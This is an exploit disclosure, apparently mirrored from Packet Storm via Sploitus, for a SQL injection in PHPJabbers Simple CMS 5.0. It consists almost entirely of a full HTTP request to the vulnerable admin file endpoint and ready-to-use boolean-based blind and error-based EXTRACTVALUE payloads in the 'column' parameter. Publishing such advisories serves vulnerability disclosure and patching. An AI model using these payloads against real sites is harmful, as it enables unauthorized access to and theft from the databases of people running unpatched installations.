Exploit for PHPJabbers Simple CMS 5.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:172116
# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection  
# Date: 2023-04-29  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.phpjabbers.com/faq.php  
# Software Link: https://www.phpjabbers.com/simple-cms/  
# Version: 5.0  
# Tested on: Kali Linux  
  
### Request ###  
  
GET  
/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10  
HTTP/1.1  
Accept: */*  
x-requested-with: XMLHttpRequest  
Referer: https://localhost/simplecms/preview.php?lid=1  
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;  
_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;  
pjd_simplecms=1; last_position=%2F  
Accept-Encoding: gzip,deflate,br  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Host: localhost  
Connection: Keep-alive  
  
### Parameter & Payloads ###  
  
Parameter: column (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)  
THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)  
END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10  
  
Type: error-based  
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP  
BY clause (EXTRACTVALUE)  
Payload: action=pjActionGetFile&column=2 AND  
EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT  
(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10